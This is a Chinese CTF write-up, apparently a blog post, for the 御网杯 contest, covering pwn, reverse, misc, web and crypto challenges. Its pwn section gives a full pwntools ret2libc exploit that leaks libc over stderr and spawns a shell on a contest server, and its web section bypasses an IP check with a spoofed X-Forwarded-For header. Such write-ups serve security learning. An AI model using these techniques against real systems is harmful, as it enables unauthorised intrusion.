御网杯 WP

PWN

ez_pwn

因为关闭了stdout,所以不能直接输出了,于是可以将输出写到stderr,然后再泄露地址,打ret2libc

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

#context.update(arch='i386',os='linux',log_level='debug')

# context(os='linux', arch='amd64')

file_name = "./pwn"  

elf = ELF(file_name)

libc = ELF("./libc-2.31.so")

  

select = 0

if select == 1:

    io = process(file_name)

else:

    io = remote('47.105.113.86',30003 )

#gdb.attach(io)

#-------------- EXP -------------------#

sd = lambda s : io.send(s)

sl = lambda s : io.sendline(s)

sa = lambda n,s : io.sendafter(n,s)

sla = lambda n,s : io.sendlineafter(n,s)

rc = lambda n : io.recv(n)

rl = lambda : io.recvline()

ru = lambda s : io.recvuntil(s)

ra = lambda : io.recvall()

it = lambda : io.interactive()

#-------------- END -------------------#

  

ru(b'blind now.')

  

pop_rdi = 0x4012c3

pop_rsi_r15 = 0x4012c1

write1 = 0x40122A

main = 0x401207

ret = 0x40101a

  

#payload  = b'a'*0x20 + p64(0xdeadbeef)

#payload += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['write']) + p64(0) + p64(write1)

#payload += p64(pop_rdi) + p64(2) + p64(0x40123E)

#sl(payload)

  

payload  = b'a'*0x20 + p64(0xdeadbeef)

payload += p64(pop_rdi) + p64(2) + p64(pop_rsi_r15) + p64(elf.got['write']) + p64(0) + p64(write1)

sl(payload)

  

write_addr = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))

success("write_addr: " + hex(write_addr))

  

libcbase = write_addr - libc.symbols['write']

system = libcbase + libc.symbols['system']

binsh = libcbase + next(libc.search(b'/bin/sh'))

  

rc(506)

payload1  = b'a'*0x20 + p64(0xdeadbeef)

payload1 += p64(pop_rdi) + p64(binsh) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(ret) + p64(system)

sl(payload1)

  

it()

执行

cat /flag >&2

image.png

re

ez_math

先使用pyinxstractor将exe反编译,然后将pyc文件拿给
使用PyLingual 然后转给

from z3 import Solver

def zini(length):

    from z3 import BitVec

    flag = [BitVec('flag[%d]' % i, 8) for i in range(length)]

    out = flag

    return flag, out

def zcheck(f,flag):

    from z3 import SolverObj,Solver,sat,Or

    print(f.check())

    while(f.check()==sat):

        try:

            condition = []

            m = f.model()

            p=""

            for i in range(len(flag)):

                p+=chr(int("%s" % (m[flag[i]])))

                condition.append(flag[i]!=int("%s" % (m[flag[i]])))

            print(p)

            f.add(Or(condition))

        except:

            pass

  
  

flag,x =zini(38)

s = Solver()

equations = [x[0] * x[16] + x[10] * x[18] + 2 * (x[11] * x[25]) + 5 * (x[13] * x[25]) - 9 * (x[13] * x[32]) - 8 * (x[15] * x[29]) + 8 * (x[17] * x[28]) + 7 * (x[19] * x[29]) - 5 * (x[19] * x[30]) - 7 * (x[19] * x[9]) - 4 * x[20] * x[20] + 7 * (x[22] * x[23]) - 5 * (x[23] * x[8]) - 8 * (x[29] * x[5]) - 7 * x[31] + 7 * (x[32] * x[9]) + 10 * (x[33] * x[4]) + 8 * x[5] * x[5] - 5 * x[8] * x[8] - 16191 == 0,

-9 * (x[1] * x[15]) - 2 * (x[10] * x[18]) + 9 * (x[11] * x[18]) - 6 * (x[12] * x[16]) - x[14] * x[15] - 3 * (x[15] * x[18]) - 9 * (x[16] * x[8]) + 10 * (x[17] * x[23]) + 4 * (x[17] * x[5]) - 2 * (x[2] * x[22]) - 4 * x[2] + 4 * (x[21] * x[3]) + 10 * (x[23] * x[25]) + 5 * (x[28] * x[33]) + 10 * (x[28] * x[5]) - 8 * (x[30] * x[36]) - 14067 == 0,

10 * (x[0] * x[26]) + 6 * (x[0] * x[29]) - 7 * (x[13] * x[29]) + 8 * (x[21] * x[7]) + 9 * (x[22] * x[25]) - 8 * (x[23] * x[5]) + 8 * (x[26] * x[32]) + 5 * (x[27] * x[30]) + 9 * (x[27] * x[31]) + 6 * (x[28] * x[6]) - 9 * (x[29] * x[5]) - 4 * (x[31] * x[8]) - 10 * (x[32] * x[35]) + 10 * x[35] * x[35] - 55102 == 0,

3 * (x[0] * x[16]) + 4 * (x[1] * x[36]) + 8 * (x[10] * x[33]) - 8 * (x[12] * x[17]) - 8 * (x[14] * x[28]) + 7 * (x[15] * x[25]) - 2 * (x[15] * x[6]) + 6 * (x[15] * x[8]) - 2 * (x[2] * x[25]) - 7 * (x[2] * x[34]) + x[23] * x[35] - 5 * (x[27] * x[9]) + 6 * (x[28] * x[30]) + 6 * (x[28] * x[37]) + 8 * (x[28] * x[7]) - 4 * x[30] + 7 * (x[32] * x[35]) + 7 * (x[35] * x[5]) + 7 * (x[35] * x[7]) - 10 * (x[5] * x[7]) - 2 * (x[7] * x[9]) - 102697 == 0,

7 * (x[0] * x[27]) + 3 * (x[1] * x[15]) - 9 * (x[1] * x[29]) - 3 * (x[10] * x[33]) - 10 * (x[12] * x[34]) - 8 * (x[15] * x[2]) - 8 * (x[18] * x[23]) - 6 * (x[19] * x[7]) - 6 * (x[2] * x[34]) + 7 * (x[2] * x[7]) - 3 * (x[20] * x[22]) - 8 * (x[23] * x[25]) - 3 * (x[26] * x[34]) - 9 * (x[28] * x[3]) - 8 * (x[28] * x[35]) + 3 * (x[36] * x[4]) + 6 * x[8] + 324145 == 0,

-9 * (x[0] * x[2]) + 5 * x[1] - 9 * (x[13] * x[3]) + 4 * (x[14] * x[17]) + 9 * (x[18] * x[29]) + 5 * (x[18] * x[9]) + 5 * (x[20] * x[23]) - x[20] * x[5] - 8 * (x[21] * x[33]) - 7 * x[27] + 6 * (x[28] * x[7]) - 7 * (x[29] * x[9]) + 10 * (x[31] * x[6]) + 52822 == 0,

-6 * (x[10] * x[29]) - 2 * (x[10] * x[33]) + 4 * (x[11] * x[31]) + 8 * (x[12] * x[27]) - 9 * (x[12] * x[36]) + 2 * (x[16] * x[24]) + 2 * (x[19] * x[34]) - 8 * (x[19] * x[37]) - 10 * (x[24] * x[7]) - 5 * (x[34] * x[6]) - 2 * (x[7] * x[8]) + 9 * x[9] + 119387 == 0,

6 * (x[0] * x[22]) - 3 * (x[12] * x[37]) - 3 * (x[12] * x[5]) - 2 * (x[13] * x[36]) - 10 * (x[19] * x[5]) + 7 * (x[2] * x[22]) + 7 * (x[2] * x[9]) - 8 * x[21] * x[21] + x[21] * x[34] - 5 * (x[23] * x[26]) + 9 * (x[25] * x[5]) + 8 * (x[25] * x[9]) + 4 * (x[3] * x[30]) - 3 * (x[37] * x[7]) - 6 * (x[37] * x[9]) + 4832 == 0,

-2 * x[0] * x[0] + 3 * (x[13] * x[29]) + x[17] * x[25] - 10 * (x[21] * x[28]) + 5 * (x[22] * x[31]) + 10 * (x[22] * x[9]) - 10 * (x[25] * x[32]) + 4 * x[27] + 6 * (x[29] * x[6]) - 4 * (x[30] * x[34]) - 9 * (x[31] * x[4]) + 2 * (x[32] * x[34]) - 7 * (x[4] * x[6]) + 123454 == 0,

4 * (x[0] * x[20]) + x[0] * x[3] - 9 * (x[1] * x[17]) + 9 * (x[11] * x[34]) - 6 * (x[13] * x[7]) - 6 * (x[14] * x[2]) + 6 * (x[14] * x[29]) + 7 * (x[15] * x[27]) - 7 * (x[18] * x[5]) - 7 * x[20] * x[20] + 8 * (x[20] * x[21]) + 9 * (x[20] * x[27]) + 2 * (x[21] * x[25]) - 6 * (x[25] * x[28]) - 9 * (x[28] * x[32]) - 6 * (x[3] * x[32]) - 3 * (x[33] * x[7]) - 8 * (x[36] * x[9]) + 170296 == 0,

6 * (x[0] * x[11]) + x[1] * x[12] - 9 * (x[1] * x[30]) - 10 * (x[1] * x[35]) + 8 * (x[10] * x[7]) + 5 * (x[14] * x[28]) + 7 * (x[16] * x[21]) - 10 * (x[19] * x[35]) + x[19] * x[6] + 8 * (x[2] * x[31]) - 2 * (x[21] * x[26]) - 3 * (x[23] * x[27]) + 9 * (x[27] * x[34]) + 4 * x[28] * x[28] - x[3] * x[31] + x[30] * x[37] - 9 * (x[30] * x[4]) + 4 * x[34] - 76173 == 0,

-8 * (x[0] * x[15]) - 4 * (x[11] * x[15]) + 9 * (x[12] * x[23]) - 10 * (x[12] * x[29]) + 8 * (x[13] * x[26]) + 6 * (x[13] * x[9]) - x[15] * x[27] - x[15] * x[33] + 3 * (x[19] * x[29]) - 10 * (x[2] * x[20]) - x[22] * x[32] + 5 * (x[23] * x[8]) + 6 * (x[32] * x[5]) - 27078 == 0,

8 * (x[1] * x[9]) + 8 * (x[10] * x[16]) - 3 * (x[10] * x[29]) - 2 * (x[11] * x[13]) + 6 * (x[11] * x[33]) + 3 * (x[12] * x[14]) + 8 * (x[12] * x[16]) + 5 * (x[16] * x[34]) + 7 * (x[18] * x[32]) + 8 * (x[19] * x[26]) + 2 * x[19] - 4 * (x[20] * x[6]) + 4 * x[22] * x[22] - 8 * (x[25] * x[5]) - 7 * (x[26] * x[34]) - x[29] + 10 * (x[3] * x[4]) - 6 * x[32] * x[32] - 299677 == 0,

3 * (x[0] * x[6]) + 7 * (x[10] * x[34]) + 9 * (x[11] * x[18]) - 8 * (x[12] * x[3]) - x[12] * x[33] - x[12] * x[34] - 7 * (x[16] * x[7]) + x[16] * x[8] - 3 * (x[19] * x[20]) - 6 * (x[19] * x[33]) - 8 * (x[22] * x[27]) - 4 * (x[24] * x[3]) + 57797 == 0,

9 * (x[0] * x[29]) + 2 * (x[1] * x[19]) + 8 * (x[10] * x[30]) - 2 * (x[11] * x[20]) - 6 * (x[11] * x[29]) + 3 * (x[13] * x[20]) - 10 * (x[14] * x[17]) - 10 * (x[15] * x[19]) + 6 * (x[15] * x[23]) + 7 * (x[15] * x[4]) + 6 * (x[18] * x[28]) + x[19] * x[3] - x[20] * x[3] - 10 * (x[21] * x[30]) + 10 * (x[22] * x[27]) - 10 * (x[23] * x[31]) + 2 * (x[24] * x[5]) - 3 * (x[25] * x[31]) + 5 * (x[26] * x[7]) + 7 * x[3] * x[3] + 7 * (x[30] * x[32]) + 6 * (x[31] * x[5]) + 10 * x[33] - 7 * x[5] - 258015 == 0,

2 * (x[0] * x[16]) - 6 * (x[1] * x[20]) + 5 * (x[10] * x[17]) - 5 * (x[15] * x[23]) + 8 * (x[16] * x[18]) + 9 * (x[19] * x[36]) + 6 * (x[2] * x[33]) - 9 * (x[23] * x[9]) + 9 * x[25] * x[25] + 2 * (x[3] * x[37]) + 7 * (x[30] * x[34]) - 2 * x[32] - 157310 == 0,

-3 * (x[0] * x[25]) - 2 * (x[1] * x[36]) + 2 * (x[10] * x[31]) + 9 * (x[13] * x[20]) - 5 * (x[15] * x[2]) - 6 * (x[15] * x[37]) - 2 * x[17] + 8 * (x[19] * x[28]) + 7 * (x[2] * x[32]) - 2 * (x[21] * x[30]) + 5 * (x[23] * x[5]) + 5 * (x[24] * x[26]) - 8 * (x[24] * x[33]) - 8 * (x[26] * x[35]) - 10 * x[26] - 10 * (x[29] * x[36]) - 2 * (x[30] * x[6]) + 4 * (x[31] * x[36]) + 9 * (x[33] * x[9]) - x[37] * x[6] + 7350 == 0,

-8 * (x[0] * x[36]) - 8 * (x[17] * x[32]) + 8 * (x[2] * x[33]) - 7 * (x[22] * x[28]) - 9 * (x[22] * x[35]) + 8 * (x[22] * x[5]) - 2 * (x[23] * x[5]) + 5 * (x[26] * x[27]) + 6 * (x[26] * x[31]) - 3 * (x[32] * x[33]) - 2 * (x[35] * x[4]) + x[36] * x[8] + 85362 == 0,

7 * (x[0] * x[33]) - 5 * (x[12] * x[35]) + x[12] * x[9] + 10 * (x[13] * x[30]) + 8 * (x[15] * x[32]) - 9 * (x[2] * x[20]) + 3 * (x[2] * x[30]) + 10 * (x[25] * x[29]) - 6 * (x[26] * x[32]) - 3 * (x[27] * x[9]) + 7 * (x[36] * x[6]) - 121182 == 0,

8 * (x[0] * x[17]) + 10 * (x[1] * x[14]) + 2 * (x[10] * x[33]) + 8 * (x[13] * x[26]) - 5 * (x[14] * x[34]) - 9 * (x[14] * x[7]) + x[18] * x[2] - 10 * (x[18] * x[7]) + x[2] * x[33] + 10 * x[20] - 6 * (x[22] * x[30]) + 6 * (x[22] * x[9]) + 10 * (x[23] * x[34]) + 9 * (x[25] * x[9]) + 7 * (x[26] * x[30]) - 9 * (x[27] * x[31]) + 7 * (x[28] * x[5]) - 8 * (x[30] * x[31]) - 9 * x[34] * x[34] + 2 * (x[36] * x[8]) - 136304 == 0,

-4 * (x[0] * x[25]) - 9 * (x[1] * x[21]) - 9 * (x[1] * x[25]) + 6 * (x[12] * x[5]) + 6 * (x[2] * x[28]) - 4 * (x[20] * x[28]) - 8 * (x[22] * x[23]) + 5 * (x[23] * x[32]) - 6 * (x[24] * x[28]) - 6 * (x[25] * x[29]) + 121526 == 0,

-4 * (x[0] * x[30]) + x[11] * x[14] - 6 * (x[12] * x[20]) - 8 * (x[13] * x[28]) + 10 * (x[15] * x[2]) - 10 * (x[18] * x[25]) + 6 * (x[22] * x[29]) - 3 * (x[25] * x[8]) + x[27] * x[36] - 2 * (x[3] * x[30]) + 10 * (x[30] * x[34]) + 4 * (x[35] * x[6]) - 27523 == 0,

-9 * (x[10] * x[30]) - 3 * (x[10] * x[6]) - 10 * (x[13] * x[29]) - 8 * (x[13] * x[7]) + 3 * (x[14] * x[32]) - 2 * (x[18] * x[20]) + 10 * (x[18] * x[34]) - 4 * (x[2] * x[7]) + 9 * (x[20] * x[22]) - 5 * (x[20] * x[33]) - 10 * (x[23] * x[34]) - 6 * x[26] + 2 * (x[3] * x[34]) + 9 * x[30] * x[30] + 8 * (x[31] * x[8]) + 9 * (x[33] * x[36]) + 35830 == 0,

7 * (x[10] * x[2]) + 2 * x[10] - 5 * (x[13] * x[9]) + 10 * (x[15] * x[33]) + 8 * (x[17] * x[23]) + 5 * x[2] * x[2] - 8 * (x[2] * x[37]) + 6 * (x[20] * x[24]) + 4 * (x[20] * x[35]) - 8 * (x[23] * x[8]) - 9 * (x[24] * x[7]) + 7 * (x[26] * x[8]) - 5 * (x[3] * x[36]) + 6 * (x[30] * x[35]) - 7 * x[36] - 5 * x[7] - 59235 == 0,

-8 * x[11] * x[11] - 9 * (x[14] * x[31]) - 8 * (x[14] * x[35]) + 7 * (x[15] * x[20]) + x[15] * x[24] + 6 * (x[15] * x[25]) - 10 * (x[16] * x[18]) - x[16] * x[9] + 8 * (x[19] * x[32]) + 5 * (x[2] * x[5]) + 6 * (x[21] * x[30]) - 10 * (x[22] * x[24]) + 2 * (x[22] * x[34]) - 10 * (x[22] * x[37]) + 4 * (x[27] * x[35]) - x[28] * x[33] + 2 * (x[28] * x[37]) + 7 * (x[29] * x[37]) - 2 * (x[34] * x[35]) - 7 * (x[35] * x[6]) + 82407 == 0,

7 * (x[0] * x[27]) + 7 * (x[10] * x[21]) - 10 * (x[10] * x[3]) + 6 * (x[13] * x[36]) - 3 * (x[15] * x[17]) + 7 * (x[15] * x[30]) - x[15] * x[7] + x[16] * x[34] + 8 * (x[17] * x[37]) + 2 * x[2] + 6 * (x[20] * x[21]) + 9 * (x[20] * x[33]) + 8 * (x[20] * x[4]) + 3 * (x[21] * x[25]) + x[22] * x[28] + 6 * x[23] * x[23] - 6 * (x[24] * x[3]) + 10 * (x[25] * x[27]) + 5 * (x[29] * x[4]) - 6 * (x[3] * x[32]) - 6 * (x[30] * x[4]) - 5 * (x[30] * x[5]) - x[33] * x[34] - 7 * (x[4] * x[9]) - 4 * (x[7] * x[9]) - 154206 == 0,

2 * x[0] * x[0] + 2 * (x[0] * x[14]) + 7 * (x[11] * x[13]) - 9 * (x[11] * x[16]) + 2 * (x[11] * x[21]) + 8 * (x[11] * x[24]) + 5 * (x[11] * x[4]) + 4 * (x[13] * x[36]) - 8 * (x[15] * x[16]) - 4 * (x[16] * x[17]) - 3 * (x[16] * x[23]) - 8 * (x[17] * x[33]) - 4 * (x[17] * x[34]) - 6 * (x[18] * x[31]) + 7 * (x[2] * x[25]) - x[20] * x[25] + 5 * (x[20] * x[9]) + 2 * (x[21] * x[26]) - 5 * (x[21] * x[5]) + 4 * (x[22] * x[35]) - 7 * (x[23] * x[9]) - 10 * (x[31] * x[7]) + 156020 == 0,

-5 * (x[12] * x[34]) + 4 * (x[12] * x[9]) - 2 * (x[13] * x[31]) + x[14] * x[9] + 4 * (x[17] * x[32]) - 2 * (x[18] * x[23]) - 10 * (x[18] * x[29]) + 6 * (x[19] * x[30]) + 4 * (x[2] * x[32]) - 9 * x[27] * x[27] - 2 * (x[3] * x[35]) - 2 * (x[3] * x[5]) - 2 * (x[7] * x[8]) + 129397 == 0,

-9 * x[1] + 5 * (x[12] * x[2]) + 4 * (x[12] * x[35]) - 5 * (x[14] * x[8]) + 2 * x[15] + 3 * (x[17] * x[22]) - 3 * (x[17] * x[23]) + 9 * (x[18] * x[33]) - 5 * (x[20] * x[23]) - 8 * (x[20] * x[34]) - 8 * (x[29] * x[6]) + 70585 == 0,

x[0] * x[1] + 6 * (x[0] * x[12]) + 10 * (x[10] * x[31]) + 8 * (x[11] * x[32]) + 9 * (x[13] * x[14]) - 2 * (x[15] * x[33]) - 9 * (x[15] * x[9]) + 4 * (x[16] * x[9]) - 2 * (x[18] * x[29]) - 5 * (x[2] * x[36]) + 2 * (x[21] * x[32]) - 8 * (x[24] * x[33]) + 9 * (x[25] * x[26]) + x[26] * x[28] - x[26] * x[3] - 3 * (x[26] * x[6]) + 6 * x[29] - 2 * (x[37] * x[7]) - 119430 == 0,

x[0] * x[2] + 10 * x[10] + 6 * (x[12] * x[18]) - 5 * (x[12] * x[35]) + 9 * (x[13] * x[29]) - 2 * (x[14] * x[37]) + 10 * (x[15] * x[23]) + 7 * (x[15] * x[4]) - 5 * (x[16] * x[9]) - 9 * (x[20] * x[8]) - 4 * (x[21] * x[27]) - 5 * (x[22] * x[5]) + x[28] * x[6] + x[3] * x[36] + 8 * (x[33] * x[35]) - 144386 == 0,

-5 * (x[1] * x[12]) + 4 * (x[1] * x[6]) + 4 * (x[11] * x[5]) + 8 * (x[15] * x[20]) + 7 * (x[15] * x[22]) - 10 * (x[19] * x[29]) - 6 * x[2] * x[2] + 5 * (x[2] * x[31]) - 2 * (x[2] * x[9]) + 2 * (x[20] * x[35]) + 7 * (x[29] * x[5]) + 8 * (x[30] * x[7]) + 8 * (x[35] * x[4]) - 2 * x[37] * x[37] - 99154 == 0,

-2 * x[0] * x[0] + 5 * (x[0] * x[11]) - 10 * (x[0] * x[21]) + 9 * (x[0] * x[30]) - 2 * (x[1] * x[29]) + 6 * (x[10] * x[29]) - 9 * (x[10] * x[30]) - 8 * (x[10] * x[32]) + 9 * x[11] * x[11] - 9 * (x[11] * x[5]) - x[13] * x[17] + 5 * (x[13] * x[6]) + 9 * (x[14] * x[20]) - 10 * x[18] * x[18] - 5 * (x[19] * x[24]) + 7 * (x[2] * x[26]) + 10 * (x[20] * x[21]) - 9 * (x[24] * x[34]) - 5 * (x[24] * x[5]) - 9 * (x[26] * x[32]) - 6 * (x[30] * x[7]) - 7 * (x[32] * x[37]) + 414339 == 0,

2 * (x[0] * x[21]) - 10 * (x[0] * x[35]) + 9 * (x[11] * x[15]) - 2 * (x[12] * x[4]) + 4 * (x[16] * x[4]) + 2 * (x[17] * x[32]) - 8 * (x[2] * x[20]) + 10 * (x[21] * x[23]) + 2 * (x[21] * x[27]) - 5 * (x[21] * x[30]) + 8 * (x[22] * x[30]) + 2 * (x[25] * x[4]) + 9 * (x[28] * x[34]) + 3 * (x[30] * x[5]) + 4 * (x[33] * x[7]) - 3 * (x[6] * x[8]) - 169458 == 0,

x[10] * x[31] - 4 * (x[10] * x[4]) - x[11] * x[22] - 10 * (x[12] * x[5]) - 4 * (x[16] * x[19]) + 3 * (x[19] * x[2]) + 3 * (x[19] * x[34]) - 6 * x[19] + 4 * (x[2] * x[32]) - 8 * (x[22] * x[33]) + 8 * x[23] * x[23] + 2 * (x[24] * x[6]) + 8 * x[31] + 2 * (x[5] * x[7]) - 26425 == 0,

8 * (x[1] * x[35]) - 3 * (x[1] * x[7]) - 3 * (x[14] * x[23]) - 6 * (x[16] * x[28]) - 2 * (x[16] * x[6]) - 7 * x[16] + 4 * (x[2] * x[4]) + x[21] * x[24] - 5 * (x[23] * x[3]) - 9 * (x[24] * x[30]) + 9 * (x[26] * x[35]) - 8 * (x[28] * x[4]) - 9 * (x[3] * x[32]) + 2 * x[3] + 209624 == 0,

-10 * (x[0] * x[28]) + 2 * (x[0] * x[3]) + 8 * (x[10] * x[30]) - x[11] * x[31] + 6 * (x[13] * x[32]) + 10 * (x[14] * x[36]) + 5 * (x[15] * x[23]) + 2 * (x[15] * x[31]) + 2 * (x[16] * x[25]) + 10 * (x[16] * x[30]) - 10 * (x[18] * x[22]) + 8 * (x[19] * x[6]) - 7 * (x[2] * x[36]) - x[21] * x[29] - 4 * (x[24] * x[4]) + 8 * (x[26] * x[5]) + 10 * (x[31] * x[5]) - 5 * (x[32] * x[7]) - 4 * (x[36] * x[5]) - 146637 == 0,

-2 * (x[1] * x[23]) + 9 * (x[10] * x[9]) + 9 * (x[15] * x[21]) + 10 * (x[16] * x[25]) + 5 * (x[16] * x[36]) + 7 * (x[16] * x[6]) + 7 * (x[18] * x[35]) + 8 * (x[19] * x[3]) - 9 * (x[19] * x[35]) + 10 * (x[2] * x[32]) + 5 * (x[2] * x[4]) - x[21] * x[27] - 6 * (x[24] * x[35]) - 3 * (x[25] * x[26]) + 6 * (x[29] * x[36]) + 6 * (x[29] * x[4]) - 3 * (x[33] * x[4]) - 5 * (x[34] * x[5]) - 3 * (x[37] * x[7]) + 9 * (x[4] * x[8]) - 422738 == 0,

]

  

for eq in  equations:

    s.add(eq)

zcheck(s,flag)

image.png

misc

ez_misc

M1BMSkhDNFQ2Z2hWbWJHZURZclA3Yk04RmFXbWNza1k=

先转化ascii转化为一个base64字符串,然后接吗得到

3PLJHC4T6ghVmbGeDYrP7bM8FaWmcskY

然后base58得到

synt{UAPGS2lcMELmSrU6H}

凯撒Caesar解码得到flag

image.png


image.png

光隙中的寄生密钥

image.png

通过binwalk之后得到一个压缩包,打开压缩包

image.png

得到一个加密的压缩包,爆破得到密码

image.png

得到数据

5a6d78685a3373355447306b576d493151484a554e434e6a546a647166513d3d

先转化为ascii,然后

image.png

image.png

flag为 flag{9Lm$Zb5@rT4#cN7j}

被折叠的显影图纸

题目给了一个xls文件,发现有密码,用011打开搜索flag{找到flag
image.png

flag{0ph!c3_3@5y_Kr4?k3d}

套娃

给了一个xls文件,利用formost提取文件,得到一个zip文件,解压发现是一个txt文件,image.png

再次使用foremost提取

得到一个docx文件

image.png

发现存在隐藏文本:

flag{HNCTFdejgf8OhT}

ez_xor

题目给了一个txt文件

image.png

发现异或一个0x39即可

cipher_hex = [
    0x5f, 0x55, 0x58, 0x5e, 0x42, 0x71, 0x7a, 0x6d,
    0x7f, 0x48, 0x4e, 0x5c, 0x78, 0x6a, 0x7d, 0x08,
    0x0e, 0x0a, 0x44
]

key = 0x39

plaintext = ''.join(chr(b ^ key) for b in cipher_hex)
print(plaintext)

WEB

easyweb

image.png

image.png

YWB_Web_xff

image.png

发现只能2.2.2.1"这个ip才能登陆,所以可以修改X-Froward-For来绕过.

image.png

Crypto

baby_rsa

010打开文本,得到题目,使用yufa分解n,

输入拿到的n

然后打开factor.log

获得p

image.png

运行脚本

from Crypto.Util.number import *

n = 12194420073815392880989031611545296854145241675320130314821394843436947373331080911787176737202940676809674543138807024739454432089096794532016797246441325729856528664071322968428804098069997196490382286126389331179054971927655320978298979794245379000336635795490242027519669217784433367021578247340154647762800402140321022659272383087544476178802025951768015423972182045405466448431557625201012332239774962902750073900383993300146193300485117217319794356652729502100167668439007925004769118070105324664379141623816256895933959211381114172778535296409639317535751005960540737044457986793503218555306862743329296169569

p=110428348144013242234907008083355974834266917027228724749730385104087025249352345946164980361082178532313669767485270254326404723948153912910688118140621712922649644396733499972695482991866293857864311557686710317462165131360819813493524457615383204504505224030129953230866877990529769205769592709254542472051

q = n // p

e=65537

c = 4504811333111877209539001665516391567038109992884271089537302226304395434343112574404626060854962818378560852067621253927330725244984869198505556722509058098660083054715146670767687120587049288861063202617507262871279819211231233198070574538845161629806932541832207041112786336441975087351873537350203469642198999219863581040927505152110051313011073115724502567261524181865883874517555848163026240201856207626237859665607255740790404039098444452158216907752375078054615802613066229766343714317550472079224694798552886759103668349270682843916307652213810947814618810706997339302734827571635179684652559512873381672063

d = pow(e,-1, (p-1)*(q-1))

m = pow(c,d,n)

print(long_to_bytes(m))

cry_rsa

题目说
在一次RSA密钥对生成中,假设p=473398607161,q=4511491,e=19
求解出d,然后把d的值加6为flag值。flag格式为flag{********}

我们可以计算:

  • n=p×qn = p \times qn=p×q

  • ϕ(n)=(p−1)(q−1)\phi(n) = (p-1)(q-1)ϕ(n)=(p−1)(q−1)

  • d≡e−1mod  ϕ(n)d \equiv e^{-1} \mod \phi(n)d≡e−1modϕ(n)

p = 473398607161
q = 4511491
e = 19

phi = (p - 1) * (q - 1)
# phi = 473398607160 * 4511490 = 2135433213725840000
d = pow(e, -1, phi)  # Python 3.8+
flag = d + 6
print(f"flag{{{flag}}}")

flag{2023326077889096385}

gift

五一劳动节爸爸给家里人带了一个礼物。由于礼物不好拿,所以把礼物平均分成了四份,但是其中一份不小心掉在地上散落成了无数片,变成了 1 - 1/3 + 1/5 - 1/7 + …
聪明的你能算出或猜出爸爸带的礼物是什么吗?flag示例: flag{apple} flag{watermelon} 提交flag值凯撒密码加密,偏移量3在提交。

凯撒密码,还提示了偏移量3

flag{slh}

easy-签到题

010打开获得一串编码

image.png

先解base64
得到
GIYDMNRWIM3DCNRXG5BDGNJWGEZTMMZTGMYTGNZWGUZTSMSEGMZDMNBTHA3DMMSEGM2DMMZTGAZTKMSEGM3TMNJTGE3DEMSEGM4DGNRTGMZTSMZQGM2DGMRTG4ZTCNRTGM2TMNBXIQ======

再解base32

20666C61677B35613633313765392D326438662D346330352D376531622D3836333930343237316335647D

然后再转化为字符串

得到flag

flag{5a6317e9-2d8f-4c05-7e1b-863904271c5d}

posted @ 2025-06-03 13:49  vstral  阅读(33)  评论(0)    收藏  举报